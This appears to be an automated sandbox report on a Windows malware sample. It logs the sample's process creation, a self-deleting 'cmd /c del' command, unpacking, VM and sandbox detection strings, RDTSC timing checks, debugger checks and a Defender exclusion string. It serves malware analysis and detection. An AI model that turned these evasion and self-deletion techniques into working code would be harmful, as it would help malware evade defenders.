Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp | Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp | Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: 457b22da_by_Libranalysis.exeReversingLabs: Detection: 31%
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeFile read: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe:Zone.IdentifierJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe 'C:\Users\user\Desktop\457b22da_by_Libranalysis.exe'
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe C:\Users\user\Desktop\457b22da_by_Libranalysis.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\457b22da_by_Libranalysis.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe C:\Users\user\Desktop\457b22da_by_Libranalysis.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\457b22da_by_Libranalysis.exe'
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: 457b22da_by_Libranalysis.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 457b22da_by_Libranalysis.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: 457b22da_by_Libranalysis.exe, 00000004.00000003.235743424.0000000001750000.00000004.00000001.sdmp, rundll32.exe, 00000009.00000002.484153846.0000000004A3F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 457b22da_by_Libranalysis.exe, rundll32.exe

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Unpacked PE file: 0.2.457b22da_by_Libranalysis.exe.250000.0.unpack U#j;F_`:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
          Source: 457b22da_by_Libranalysis.exe | Static PE information: section name: U#j;F_`
          Source: 457b22da_by_Libranalysis.exe | Static PE information: section name:
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 0_2_04BFE0D2 pushad ; ret
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 0_2_053E1F08 pushad ; iretd
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_004161E7 push edi; retf
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_004151B4 pushfd ; ret
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0041543B pushfd ; iretd
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_00415485 push edx; ret
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_00E3B9FA push ss; retf
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_00E38118 push FFFFFF8Fh; retf
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_00E3B346 push cs; retf
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_00E3BB44 push ds; retf
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_00E3BB56 push ds; retf
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_00E3BB32 push ds; retf
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_00E38485 push ds; ret
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_00E3ADE3 pushad ; retf
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_00E3B5F8 push cs; retf
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_00E3B5C2 push cs; retf
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_00E3AE02 pushad ; retf
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_00E3B610 push cs; retf
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_00E38FD4 push ds; ret
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0196D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0499D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_009051B4 pushfd ; ret
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_009061E7 push edi; retf
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0090B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00905485 push edx; ret
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0090B402 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0090B40B push eax; ret
          Source: initial sample | Static PE information: section name: U#j;F_` entropy: 7.99977911602
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match | File source: 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: 457b22da_by_Libranalysis.exe PID: 4120, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exe | RDTSC instruction interceptor: First address: 00000000008F85E4 second address: 00000000008F85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exe | RDTSC instruction interceptor: First address: 00000000008F897E second address: 00000000008F8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe TID: 5504 | Thread sleep time: -104854s >= -30000s
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe TID: 5808 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe TID: 808 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6460 | Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Thread delayed: delay time: 104854
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Thread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000005.00000000.257996526.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.257996526.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000005.00000000.263927638.000000000F596000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.256121125.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.257172140.0000000008640000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp | Binary or memory string: vmware
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000005.00000002.493965122.00000000055D0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp | Binary or memory string: VMWARE
          Source: explorer.exe, 00000005.00000000.257996526.000000000871F000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000005.00000000.257996526.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.258585279.00000000087D1000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000005.00000000.251488161.0000000005603000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.256121125.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.256121125.0000000008220000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000005.00000000.256121125.0000000008220000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process information queried: ProcessInformation

          Anti Debugging:

          Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 0_2_00C91660 CheckRemoteDebuggerPresent,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01942990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0194FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0194FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0194A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0193C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01942581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01942581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01942581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01942581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01912D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01912D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01912D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01912D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01912D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01941DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01941DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01941DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019C8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0191B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0191B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0191B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019A41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0192D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0192D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01919100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01919100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01919100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0191AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019E8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0194513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0194513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0199A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01944D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01944D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01944D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01934120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01934120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01934120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01934120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01934120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01937D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01953D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0193B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0193B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01993540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0191B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0191B171 mov eax, dword ptr fs:[00000030h]
